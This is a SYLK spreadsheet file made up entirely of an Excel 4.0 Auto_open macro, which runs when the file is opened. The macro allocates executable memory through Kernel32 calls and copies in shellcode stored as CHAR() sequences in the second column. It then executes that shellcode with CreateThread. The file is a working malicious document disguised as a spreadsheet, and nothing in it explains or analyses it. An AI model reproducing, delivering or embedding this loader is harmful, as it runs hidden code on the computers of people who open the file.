ID;P
O;E
NN;NAuto_open;ER1C1
C;X1;Y1;ER1C2()
C;X1;Y2;ECALL("Kernel32","VirtualAlloc","JJJJJ",0,1000000,4096,64)
C;X1;Y3;ESELECT(R1C2:R1000:C2,R1C2)
C;X1;Y4;ESET.VALUE(R1C3, 0)
C;X1;Y5;EWHILE(LEN(ACTIVE.CELL())>0)
C;X1;Y6;ECALL("Kernel32","WriteProcessMemory","JJJCJJ",-1, R2C1 + R1C3 * 20,ACTIVE.CELL(), LEN(ACTIVE.CELL()), 0)
C;X1;Y7;ESET.VALUE(R1C3, R1C3 + 1)
C;X1;Y8;ESELECT(, "R[1]C")
C;X1;Y9;ENEXT()
C;X1;Y10;ECALL("Kernel32","CreateThread","JJJJJJJ",0, 0, R2C1, 0, 0, 0)
C;X1;Y11;EHALT()
C;X2;Y1;ECHAR(189)&CHAR(243)&CHAR(136)&CHAR(66)&CHAR(249)&CHAR(218)&CHAR(222)&CHAR(217)&CHAR(116)&CHAR(36)&CHAR(244)&CHAR(90)&CHAR(43)&CHAR(201)&CHAR(177)&CHAR(82)&CHAR(49)&CHAR(106)&CHAR(18)&CHAR(3)
C;X2;Y2;ECHAR(106)&CHAR(18)&CHAR(131)&CHAR(49)&CHAR(140)&CHAR(160)&CHAR(12)&CHAR(73)&CHAR(101)&CHAR(166)&CHAR(239)&CHAR(177)&CHAR(118)&CHAR(199)&CHAR(102)&CHAR(84)&CHAR(71)&CHAR(199)&CHAR(29)&CHAR(29)
C;X2;Y3;ECHAR(248)&CHAR(247)&CHAR(86)&CHAR(115)&CHAR(245)&CHAR(124)&CHAR(58)&CHAR(103)&CHAR(142)&CHAR(241)&CHAR(147)&CHAR(136)&CHAR(39)&CHAR(191)&CHAR(197)&CHAR(167)&CHAR(184)&CHAR(236)&CHAR(54)&CHAR(166)
C;X2;Y4;ECHAR(58)&CHAR(239)&CHAR(106)&CHAR(8)&CHAR(2)&CHAR(32)&CHAR(127)&CHAR(73)&CHAR(67)&CHAR(93)&CHAR(114)&CHAR(27)&CHAR(28)&CHAR(41)&CHAR(33)&CHAR(139)&CHAR(41)&CHAR(103)&CHAR(250)&CHAR(32)
C;X2;Y5;ECHAR(97)&CHAR(105)&CHAR(122)&CHAR(213)&CHAR(50)&CHAR(136)&CHAR(171)&CHAR(72)&CHAR(72)&CHAR(211)&CHAR(107)&CHAR(107)&CHAR(157)&CHAR(111)&CHAR(34)&CHAR(115)&CHAR(194)&CHAR(74)&CHAR(252)&CHAR(8)
C;X2;Y6;ECHAR(48)&CHAR(32)&CHAR(255)&CHAR(216)&CHAR(8)&CHAR(201)&CHAR(172)&CHAR(37)&CHAR(165)&CHAR(56)&CHAR(172)&CHAR(98)&CHAR(2)&CHAR(163)&CHAR(219)&CHAR(154)&CHAR(112)&CHAR(94)&CHAR(220)&CHAR(89)
C;X2;Y7;ECHAR(10)&CHAR(132)&CHAR(105)&CHAR(121)&CHAR(172)&CHAR(79)&CHAR(201)&CHAR(165)&CHAR(76)&CHAR(131)&CHAR(140)&CHAR(46)&CHAR(66)&CHAR(104)&CHAR(218)&CHAR(104)&CHAR(71)&CHAR(111)&CHAR(15)&CHAR(3)
C;X2;Y8;ECHAR(115)&CHAR(228)&CHAR(174)&CHAR(195)&CHAR(245)&CHAR(190)&CHAR(148)&CHAR(199)&CHAR(94)&CHAR(100)&CHAR(180)&CHAR(94)&CHAR(59)&CHAR(203)&CHAR(201)&CHAR(128)&CHAR(228)&CHAR(180)&CHAR(111)&CHAR(203)
C;X2;Y9;ECHAR(9)&CHAR(160)&CHAR(29)&CHAR(150)&CHAR(69)&CHAR(5)&CHAR(44)&CHAR(40)&CHAR(150)&CHAR(1)&CHAR(39)&CHAR(91)&CHAR(164)&CHAR(142)&CHAR(147)&CHAR(243)&CHAR(132)&CHAR(71)&CHAR(58)&CHAR(4)
C;X2;Y10;ECHAR(234)&CHAR(125)&CHAR(250)&CHAR(154)&CHAR(21)&CHAR(126)&CHAR(251)&CHAR(179)&CHAR(209)&CHAR(42)&CHAR(171)&CHAR(171)&CHAR(240)&CHAR(82)&CHAR(32)&CHAR(43)&CHAR(252)&CHAR(134)&CHAR(231)&CHAR(123)
C;X2;Y11;ECHAR(82)&CHAR(121)&CHAR(72)&CHAR(43)&CHAR(18)&CHAR(41)&CHAR(32)&CHAR(33)&CHAR(157)&CHAR(22)&CHAR(80)&CHAR(74)&CHAR(119)&CHAR(63)&CHAR(251)&CHAR(177)&CHAR(16)&CHAR(53)&CHAR(185)&CHAR(83)
C;X2;Y12;ECHAR(5)&CHAR(221)&CHAR(67)&CHAR(163)&CHAR(193)&CHAR(27)&CHAR(205)&CHAR(69)&CHAR(167)&CHAR(51)&CHAR(155)&CHAR(222)&CHAR(80)&CHAR(173)&CHAR(134)&CHAR(148)&CHAR(193)&CHAR(50)&CHAR(29)&CHAR(209)
C;X2;Y13;ECHAR(194)&CHAR(185)&CHAR(146)&CHAR(38)&CHAR(140)&CHAR(73)&CHAR(222)&CHAR(52)&CHAR(121)&CHAR(186)&CHAR(149)&CHAR(102)&CHAR(44)&CHAR(197)&CHAR(3)&CHAR(14)&CHAR(178)&CHAR(84)&CHAR(200)&CHAR(206)
C;X2;Y14;ECHAR(189)&CHAR(68)&CHAR(71)&CHAR(153)&CHAR(234)&CHAR(187)&CHAR(158)&CHAR(79)&CHAR(7)&CHAR(229)&CHAR(8)&CHAR(109)&CHAR(218)&CHAR(115)&CHAR(114)&CHAR(53)&CHAR(1)&CHAR(64)&CHAR(125)&CHAR(180)
C;X2;Y15;ECHAR(196)&CHAR(252)&CHAR(89)&CHAR(166)&CHAR(16)&CHAR(252)&CHAR(229)&CHAR(146)&CHAR(204)&CHAR(171)&CHAR(179)&CHAR(76)&CHAR(171)&CHAR(5)&CHAR(114)&CHAR(38)&CHAR(101)&CHAR(249)&CHAR(220)&CHAR(174)
C;X2;Y16;ECHAR(240)&CHAR(49)&CHAR(223)&CHAR(168)&CHAR(252)&CHAR(31)&CHAR(169)&CHAR(84)&CHAR(76)&CHAR(246)&CHAR(236)&CHAR(107)&CHAR(97)&CHAR(158)&CHAR(248)&CHAR(20)&CHAR(159)&CHAR(62)&CHAR(6)&CHAR(207)
C;X2;Y17;ECHAR(27)&CHAR(78)&CHAR(77)&CHAR(77)&CHAR(13)&CHAR(199)&CHAR(8)&CHAR(4)&CHAR(15)&CHAR(138)&CHAR(170)&CHAR(243)&CHAR(76)&CHAR(179)&CHAR(40)&CHAR(241)&CHAR(44)&CHAR(64)&CHAR(48)&CHAR(112)
C;X2;Y18;ECHAR(40)&CHAR(12)&CHAR(246)&CHAR(105)&CHAR(64)&CHAR(29)&CHAR(147)&CHAR(141)&CHAR(247)&CHAR(30)&CHAR(182)
C;X2;Y19;K0;ERETURN()
E

